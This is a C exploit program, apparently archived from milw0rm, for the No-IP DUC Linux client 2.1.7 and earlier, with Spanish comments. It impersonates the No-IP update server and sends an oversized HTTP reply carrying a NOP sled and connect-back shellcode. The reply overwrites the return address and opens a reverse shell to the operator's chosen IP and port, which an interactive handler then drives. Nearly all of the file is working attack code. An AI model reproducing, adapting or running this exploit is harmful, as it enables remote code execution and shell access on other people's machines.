No-IP DUC 2.1.7 - Remote Code Execution

/*
     _  __                 __  ___      __       
    | |/ /__  ____  ____  /  |/  /_  __/ /_____ _
    |   / _ \/ __ \/ __ \/ /|_/ / / / / __/ __ `/
   /   /  __/ / / / /_/ / /  / / /_/ / /_/ /_/ / 
  /_/|_\___/_/ /_/\____/_/  /_/\__,_/\__/\__,_/  

  xenomuta [ arroba ] phreaker [ punto ] net
  http://xenomuta.tuxfamily.org/ - Methylxantina 256mg

  Permlink:
  http://xenomuta.tuxfamily.org/exploits/noIPwn3r.c
  
  ** noIPwn3r **
  Exploit 0-day para el cliente DDNS noip-2.1.7 de linux 

  Vulnerable: noip2-Linux <= 2.1.7 
  probado v.s. la version pre-compilada del cliente en
  Ubuntu 7.10, Slackware 10.2 y Centos 4.5

  probablemente la version 64bits tambien es vulnerable.

  El programador confia a ciegas en la respuesta del servidor
  y plago el codigo de variables estaticas sin chequeo de size...
  Con un DNS envenenado o MITM podemos darle mambo.

  saludos a:
   4rd3b4r4n, kakata, garay, str0ke y fr1t0l4y

*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <fcntl.h>
#include <assert.h>

#define HTTP_OK "HTTP/1.1 200 OK\r\n\r\n"
#define NOIP_PORT 8245
#define u_char unsigned char

/* Offsets del shellcode x version
*  ( ubicalo aproximado con gdb, info addr buffer+32 )
*/
struct OFFSET {
	char ver[7];
	u_char offset[4];
	int padding;
} victima[] = {
	"custom", "\xff\xff\xff\xff", 162,
	"2.1.7", "\x5d\x1f\x05\x08", 162,
	"2.1.3", "\x5f\x12\x05\x08", 162,
	"2.1.1", "\xdd\x14\x05\x08", 138,
	"\x00", "\x00", 0 };


/* Una cacarita pa que rebale por si acaso */
char guineo[] =
	"\x90\x90\x90\x90\x90\x90\x90\x90" 
	"\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90" 
	"\x90\x90\x90\x90\x90\x90\x90\x90";

char shellcode[] =
// Connect-back IP:puerto - Creditos para izik de tty64.org
	"\xb0\x17\x31\xdb\xcd\x80\x6a\x66"
	"\x58\x99\x6a\x01\x5b\x52\x53\x6a"
	"\x02\x89\xe1\xcd\x80\x5b\x5d\xbe"
	"\x80\xff\xff\xfe\xf7\xd6\x56\x66"
	"\xbd\x69\x7a\x0f\xcd\x09\xdd\x55"
	"\x43\x6a\x10\x51\x50\xb0\x66\x89"
	"\xe1\xcd\x80\x87\xd9\x5b\xb0\x3f"
	"\xcd\x80\x49\x79\xf9\xb0\x0b\x52"
	"\x68\x2f\x2f\x73\x68\x68\x2f\x62"
	"\x69\x6e\x89\xe3\x52\x53\xeb\xdf";

int uso () {
 fprintf(stderr, "Uso:\n ./noIPwn3r <ip escucha> <puerto escucha> [ 0xOFFSET ]\n\n");
 fprintf(stderr, " Especifique el IP y puerto donde desea el shell reverso\n");
 fprintf(stderr, " Puede usar un Offset arbitrario,\n - ejemplo: 0x08050c20 para la version 2.1.1 compilada en Redhat con gcc 3.4.6-9\n" );
 fprintf(stderr, " Si no asigna el offset se usaran los de las versiones oficiales pre-compiladas.\n\n");
 return -1;
}

void revshell(int sock, char *ip) {
	char *buf;
	int flags, i;
	long l;
	
	buf = (char *)malloc(1024);
	
	for (i = 0; i <= sock; i++) {
		flags = fcntl(i,F_GETFL,0);
		assert(flags != -1);
		fcntl(i, F_SETFL, flags | O_NONBLOCK);		
	}
	
	while (1) {
		memset(buf, 0, 1024);
		if ((buf[0] = getchar()) > 0) {
			if ((send(sock, buf, strlen(buf), 0)) < 1) {
				break;
			}
		}

		memset(buf, 0, 1024);		
		if (recv(sock, buf, 1024, 0) > 0) { 
			write(1, buf, strlen(buf), 0);
			fflush(stdout);
			i = 1;
		} else if (i) {
			i = 0;
			printf("\nnoIPwn3r@%s$ ", ip);
			fflush(stdout);
		}
	}
	printf ("\n-= ADIOS =-\n");
	return;
}


int main (int argc, char **argv) {
	char *xploit, *ver, *hexmap;
 	u_char custom[4];
	int i, v = 0, port;

	// Payola 
	printf("\n noIPwn3r - xploit para noip-2.1.x linux\n");
	printf("     _  __                 __  ___      __\n");
	printf("    | |/ /__  ____  ____  /  |/  /_  __/ /_____ _\n");
	printf("    |   / _ \\/ __ \\/ __ \\/ /|_/ / / / / __/ __ `/\n");
	printf("   /   /  __/ / / / /_/ / /  / / /_/ / /_/ /_/ / \n");
	printf("  /_/|_\\___/_/ /_/\\____/_/  /_/\\__,_/\\__/\\__,_/\n\n");
	printf("  http://xenomuta.tuxfamily.org - xenomuta%cphreaker.net\n\n", '@');

	if (argc < 3)
		return uso();

	memset(custom, 0, 4);
	if (argv[3]) {
		if ((strlen(argv[3]) < 10) || (strncmp(argv[3],"0x", 2)))
			return fprintf(stderr, "Offset Invalido. Utilize el formato 0x<HEX x 8>\n");

		hexmap = (char *)malloc(16);
		memset(hexmap, 0, 16);
		strcpy(hexmap, "0123456789ABCDEFabcdef");
		for (i = 2; i < 10; i++)
			if (!strchr(hexmap, argv[3][i]))
				return fprintf(stderr, "Offset Invalido. Utilize el formato 0x<HEX x 8>\n");
		for (i = 0; i < 4; i++) {
			custom[i] = (strchr(hexmap, (argv[3][8-(2*i)] >= 0x61)?argv[3][8-(2*i)] - 32:argv[3][8-(2*i)]) - hexmap) * 16;
			custom[i] += (strchr(hexmap, (argv[3][9-(2*i)] >= 0x61)?argv[3][9-(2*i)] - 32:argv[3][9-(2*i)]) - hexmap);
		}
		strncpy((char *)&victima[0].offset, (char *)&custom, 4);
	}

	port = atoi(argv[2]);
	if ((port < 0)||(port>65535))
		return fprintf(stderr, "ERROR: puerto debe ser >= 1 <= 65535\n");

	// sockets servidor / cliente
	int s, c, len = 16, on = 1;	
	struct sockaddr_in sa, ca; 

	sa.sin_addr.s_addr = 0;
	sa.sin_port = htons(NOIP_PORT);
	sa.sin_family = AF_INET;
	s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
	setsockopt(s, SOL_SOCKET, SO_REUSEADDR, &on, sizeof(on));

	if (bind(s, (struct sockaddr *)&sa, len)) {
		fprintf(stderr, "ERROR: bind()\n");
		exit(-1);
	}
	if (listen(s, 5)) {
		fprintf(stderr, "ERROR: listen()\n");
		exit(-1);
	}
	
	// Una IP random cualquiera para forzar el cliente a hacer un update
	printf("* Esperando que pregunte cual es su IP...");
	fflush(stdout);
	c = accept(s, (struct sockaddr *)&ca, (socklen_t *)&len);
	printf("OK:\n  - Conexion desde %s:%d\n\n", inet_ntoa(ca.sin_addr), ca.sin_port);

	xploit = (char *)malloc(1024); memset(xploit, 0, 1024);
	sprintf(xploit, "%s1.2.%d.%d", HTTP_OK, ((getpid() << 16)%254), (getpid()%254));

	// Averigua la version del Cliente
	ver = (char *)malloc(1024);
	memset(ver, 0, 1024);
	recv(c, ver, 1024, 0);

	if (!(ver = strstr(ver, "/2") + 1)) {	// User-Agent: Linux-DUC/2.X.X
		close(c);
		close(s);
		return fprintf(stderr, "\nERROR: Veriosn no encontrada\n");
	}
	
	memset(ver+5, 0, 1);
	
	// Busca los offset de esta version
	for (v = 0; (!argv[3]) && strlen(victima[v].ver); v++)
		if(!strcmp(victima[v].ver, ver)) break;

	if (!victima[v].ver) {
		close(c);
		close(s);
		return fprintf(stderr, "\nERROR: Veriosn no encontrada\n");
	}

	send(c, xploit, strlen(xploit), 0);
	close(c);

	// Ahora el fuetazo   >;)
	printf("* Preparando Exploit v.s. %s @ ", ver);	
	printf("0x%02x%02x%02x%02x\n", victima[v].offset[3], victima[v].offset[2], victima[v].offset[1], victima[v].offset[0]);

	// Setea el puerto en el Shellcode
	shellcode[34] = (char )((port >> 8) & 0xff);
	shellcode[33] = (char )(port & 0xff);

	// Setea la IP de retorno en el Shellcode
	unsigned long backip = (inet_addr(argv[1]) ^ 0xffffffff);
	*(unsigned long *)(((shellcode)+24)) = (backip);

	// Prepara el HTTP reply	
	memset(xploit, 0, 1024);
	sprintf(xploit, "%s<domain =:%s%s", HTTP_OK, guineo, shellcode);

	// Completa con basura pal' relleno
	for (i = 0; i < victima[v].padding; i++)
		strcat(xploit, "\x41"); 

	// Finalmente, trukeame el %EIP
	strcat(xploit, (char *)&victima[v].offset);
	
	printf("* Esperando la conexion de update...");
	fflush(stdout);
	c = accept(s, (struct sockaddr *)&ca, (socklen_t *)&len);
	printf("OK:\n  - Conexion desde %s:%d\n\n", inet_ntoa(ca.sin_addr), ca.sin_port);
	send(c, xploit, strlen(xploit), 0);
	close(c);
	close(s);
	printf("* Exploit Enviado!!\n\n");

	sa.sin_addr.s_addr = 0;
	sa.sin_port = htons(port);
	sa.sin_family = AF_INET;
	s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
	setsockopt(s, SOL_SOCKET, SO_REUSEADDR, &on, sizeof(on));

	if (bind(s, (struct sockaddr *)&sa, len)) {
		fprintf(stderr, "ERROR: bind()\n");
		exit(-1);
	}
	if (listen(s, 5)) {
		fprintf(stderr, "ERROR: listen()\n");
		exit(-1);
	}
	
	// Una IP random cualquiera para forzar el cliente a hacer un update
	printf("* Esperando el shell en %s:%d: ", argv[1], port);
	fflush(stdout);
	c = accept(s, (struct sockaddr *)&ca, (socklen_t *)&len);
	// dup2 y NONBLOCK
	printf("OK:\n  - Conexion desde %s:%d\n\n", inet_ntoa(ca.sin_addr), ca.sin_port);
	printf("noIPwn3d!!!!\n\n", inet_ntoa(ca.sin_addr), ca.sin_port);
	revshell(c, inet_ntoa(ca.sin_addr));
	close(c);
	close(s);
}

// milw0rm.com [2008-11-18]